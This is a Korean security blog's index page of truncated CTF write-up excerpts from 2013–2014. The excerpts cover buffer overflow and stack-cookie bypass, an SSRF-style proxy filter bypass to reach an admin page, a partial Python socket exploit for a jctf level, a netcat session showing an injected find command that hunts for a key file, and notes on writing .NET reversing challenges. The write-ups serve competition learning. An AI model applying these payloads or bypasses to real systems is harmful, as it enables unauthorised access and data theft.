sweetchip's blog

Binary : angry_doraemon_c927b1681064f78612ce78f6b93c14d9 문제엔 두부분으로 공격할 수 있다. 1. Stack Based Buffer Overflow2. Pointer 1번은 bof 취약점이 있는 부분을 공격하면 되고, 2번은 4바이트의 값을 받고 그곳으로 점프한다. 하지만 필터링을 우회해야 한다. 예를들어서 AAAA 를 넣으면 0x41414141 로 점프하는 방법이다. 어떤 방법으로든 할순 있겠지만 아이디어가 떠오르지 않아 BOF 방향으로 진행했다. 그리고 이문제를 풀면서 스택쿠키가 4바이트이고 그 값이 똑같으면 우회할 수 있다는 것을 처음 알게 되었다. 이하 Exploit from socket import *import structimport time ip ..

0x10 정보보안/0x13 Write-Up 2014. 2. 25. 09:36

문제는 말그대로 WebProxy 문제이고 웹사이트 링크를 넣으면 서버가 그 곳에 get 메소드로 요청한뒤 정보를 받아온다. 문제 html 소스코드를 살펴보면 마지막줄에 라는 소스코드가 있는데, 이 url로 접속해보니 403 Access 관련 오류가 나온다. 문제 의도는 admin 페이지를 읽는것으로 추정하고 문제 풀이에 들어갔다. 먼저 조금더 확인을 위해 여러 url과 필터링되는 값을 알아본 결과 // 와 php 라는 글자가 필터링된다. 이후 잠시 진전이 없다가 127.0.0.1/~/admin/ 으로 접근하면 어떨까 생각이 들고 바로 시행한 결과 200 OK 사인이 떨어졌다. 하지만 문제점이있다. 이렇게 access가 된다고 해도 2줄밖에 표시를 안한다는 점인데 이점은 Range 헤더를 추가하면 간단히 ..

0x10 정보보안/0x13 Write-Up 2014. 2. 25. 09:30

nuclear_d4f699f3dbb8aadf7c224aa57f57eb4c from socket import * from struct import * import time p = lambda x : pack(" [ ] Enter coordinate of target, (Latitude/Longitude) ---> [ ] Target coordinate setting completed. > [!] Unknown command : 11111111111111111111111111111111111111111111111111111111 11111111111111111111111111111111111111111111111111111111111111111111111111111111 11111111111111111111..

0x10 정보보안/0x13 Write-Up 2014. 2. 16. 14:32

Closure ----- closure C:\Users\Administrator>nc 58.229.183.22 2020$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$1. Login2. Create Account3. Quit$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 2Username: 5[531320059] user created.$ 1Username: 531320059login success.##################################1. create file2. check file list3. Log out################################### 1[ ] input filename to write : ~ -name key -e..

0x10 정보보안/0x13 Write-Up 2014. 2. 16. 14:21

Binary : level4 from socket import *import structimport time p = lambda x : struct.pack("

0x10 정보보안/0x13 Write-Up 2014. 2. 15. 00:27

level10 binary # jctf 2013 lv10 exploit - from socket import *import time ip = "127.0.0.1"port = 31333 payload = "257\n" # type conversionpayload = "134525080\n" # random[16]payload = "7\n" # exitpayload = "A"*19 #buff ~ 19payload = "\n" # buff ~ 20 s = socket(AF_INET, SOCK_STREAM)s.connect((ip, port)) print s.recv(1024)s.send("257\n") print s.recv(1024)s.send("134525080\n") print s.recv(1024)s...

0x10 정보보안/0x13 Write-Up 2014. 2. 6. 12:44

2013년 11월 8일 오전 10시 @분 ~ 오후 4시 5분까지 POC 이벤트 홀에서 여성 해킹방어대회 본선이 진행 되었습니다. 저는 학교에 수능성적을 적으려 잠시 다녀오고 11시에 양재동으로 가는데 차가 막혀서 거의 12시약간 안되서부터 운영에 참가했었습니다. 그리고 제 문제는 대략 2시 이후에 공개되었엇는데, 공개가 되고 난 뒤 돌아다녀보니 많은 팀들이 닷넷 리버싱을 풀고 계셨습니다. 예선때 문제를 생각보다 잘 푸셧기 때문에[한번에 풀 수 있는 트릭을 잘 사용하신 팀이 상당히 많았음] 본선엔 약간 난이도를 올려 크랙미에서 키젠미로 내려고 하게 되었고, 예선때와 마찬가지로 손수 난독화를 진행해서 최종적으로 출제했었습니다. F2EE31BCB5BD7DE78280E949877018AAF7F1C610 문제는 ..

0x10 정보보안/0x13 Write-Up 2013. 11. 9. 00:27

2013년 10월 5일, 온라인으로 POC의 이벤트중 하나인 여성해킹방어대회 POWER OF XX가 진행되엇습니다. 그중 저는 간단한 리버싱 문제를 출제했었는데 일반 닷넷 크랙미 수준으로 출제 되었습니다. 닷넷 프로그램의 특징은 자바와 비슷하게 거의 완벽한 코드 복구가 가능하다는 것입니다. 일반 c / c 로 컴파일된 프로그램의 경우 IDA의 HexRay도 거의 완벽하게 복구해주지만, 일반적인 경우엔 어셈블리 코드를 보면서 직접 이해해야 합니다. 하지만 닷넷 문제의 경우 .net reflector 나 ilspy 라는 프로그램을 이용하여 거의 완벽하게 복구가 가능합니다. [이유는 검색~!] 이점을 이용하게 하기 위해 문제에 간단하게 Ilspy를 다운받을 수 있는 링크를 힌트로 줬고 너무 쉽게 풀리는것을 방..

0x10 정보보안/0x13 Write-Up 2013. 11. 8. 23:46